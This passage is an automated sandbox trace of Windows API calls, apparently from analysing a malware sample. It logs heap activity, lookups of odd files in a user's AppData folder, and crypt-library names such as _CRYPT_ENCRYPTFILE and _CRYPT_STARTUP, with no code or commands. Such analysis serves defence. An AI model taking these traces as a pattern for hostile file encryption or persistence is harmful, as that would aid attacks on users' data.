lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0236.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0236.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0236.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0236.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0236.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0236.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0236.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0236.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0236.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0236.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0236.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0236.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0236.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0236.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0236.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0236.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0236.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0236.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0236.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0236.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x64) returned 0x2e564e0 [0236.350] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/P22ObdW9p9DNX.mkv", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\P22ObdW9p9DNX.mkv", lpFilePart=0x8cf650*="P22ObdW9p9DNX.mkv") returned 0x31 [0236.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0236.350] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\P22ObdW9p9DNX.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\p22obdw9p9dnx.mkv")) returned 0xffffffff [0236.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0236.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0236.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0236.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0236.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0236.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0236.351] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0236.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0236.351] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0236.351] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0236.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0236.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0236.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0236.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0236.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0236.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0236.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0236.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0236.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0236.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0236.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0236.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0236.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0236.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pROXe.ods", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0236.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ROXe.ods", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0236.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OXe.ods", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0236.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xe.ods", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0236.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e.ods", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0236.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0236.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0236.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0236.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0236.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0236.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0236.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0236.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0236.352] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0236.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0236.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0236.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0236.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0236.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0236.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0236.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0236.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0236.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0236.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0236.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0236.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0236.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0236.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0236.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0236.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0236.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0236.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0236.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0236.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0236.352] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pROXe.ods", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0236.352] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ROXe.ods", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0236.352] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OXe.ods", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0236.352] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xe.ods", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0236.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0236.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0236.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0236.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0236.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0236.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0236.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0236.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0236.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0236.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0236.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0236.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0236.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0236.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0236.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0236.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0236.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0236.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0236.353] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0236.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04118 [0236.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0236.354] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0236.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04118 | out: hHeap=0x970000) returned 1 [0236.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0236.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0236.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0236.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0236.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0236.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0236.354] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0236.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0236.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0236.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0236.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0236.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0236.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0236.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0236.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0236.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0236.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0236.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0236.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0236.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0236.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0236.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0236.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0236.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0236.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0236.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0236.355] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0236.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0236.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0236.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0236.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0236.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0236.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0236.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0236.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0236.356] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0236.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0236.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0236.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0236.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0236.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0236.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0236.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0236.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0236.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0236.356] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0236.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0236.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0236.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0236.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0236.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0236.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0236.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0236.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0236.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0236.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0236.357] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0236.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0236.357] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0236.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0236.357] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/pROXe.ods", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58ea2b20, ftCreationTime.dwHighDateTime=0x1d5ef19, ftLastAccessTime.dwLowDateTime=0x97626bc0, ftLastAccessTime.dwHighDateTime=0x1d5e5c7, ftLastWriteTime.dwLowDateTime=0x97626bc0, ftLastWriteTime.dwHighDateTime=0x1d5e5c7, nFileSizeHigh=0x0, nFileSizeLow=0x7aa, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="pROXe.ods", cAlternateFileName="")) returned 0xa87590 [0236.357] FindClose (in: hFindFile=0xa87590 | out: hFindFile=0xa87590) returned 1 [0236.357] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0236.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0236.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0236.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0236.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0236.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0236.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0236.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0236.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0236.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0236.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0236.358] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0236.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0236.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0236.358] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0236.358] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0236.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0236.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0236.358] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0236.358] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0236.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0236.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0236.358] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0236.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0236.359] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0236.359] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0236.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0236.359] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0236.359] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0236.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0236.359] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0236.359] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0236.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0236.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0236.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0236.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0236.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0236.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0236.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0236.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0236.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0236.360] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0236.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0236.360] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0236.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0236.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0236.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0236.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 